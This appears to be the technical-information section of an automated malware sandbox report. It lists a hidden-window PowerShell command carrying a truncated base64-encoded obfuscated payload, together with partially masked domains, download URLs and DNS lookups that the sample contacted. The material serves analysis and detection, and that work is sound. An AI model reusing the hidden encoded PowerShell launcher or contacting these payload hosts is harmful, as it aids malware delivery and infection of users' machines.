Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WinDowsTyle hidden -e LgAoACAAJABFAG4AVgA6AGMATwBtAHMAcABFAGMAWwA0ACwAMgA2ACwAMgA1AF0ALQBqAG8ASQBuACcAJwApACAAKAAgACgAKAAoACIAewAzADcAfQB7ADcANQB9AHsAOQA2AH0AewA1ADIAfQB7ADIANwB9AHsAOQA4AH0Aew...
- 'th####kers.id.au':80
- 'ty####amesbush.com':80
- 'ty####amesbush.com':443
- 'la###smith.com':80
- 'la###smith.com':443
- 'se#####iselvaggi.org':80
- http://th####kers.id.au/RSmGtEOy0/
- http://ty####amesbush.com/aEJe1e0RQc/
- http://la###smith.com/NDw3420UwA/
- http://se#####iselvaggi.org/dnj3f1n/
- 'ty####amesbush.com':443
- 'la###smith.com':443
- DNS ASK th####kers.id.au
- DNS ASK ty####amesbush.com
- DNS ASK th###age.co.uk
- DNS ASK la###smith.com
- DNS ASK se#####iselvaggi.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WinDowsTyle hidden -e LgAoACAAJABFAG4AVgA6AGMATwBtAHMAcABFAGMAWwA0ACwAMgA2ACwAMgA1AF0ALQBqAG8ASQBuACcAJwApACAAKAAgACgAKAAoACIAewAzADcAfQB7ADcANQB9AHsAOQA2AH0AewA1ADIAfQB7ADIANwB9AHsAOQA4AH0Aew...' (with hidden window)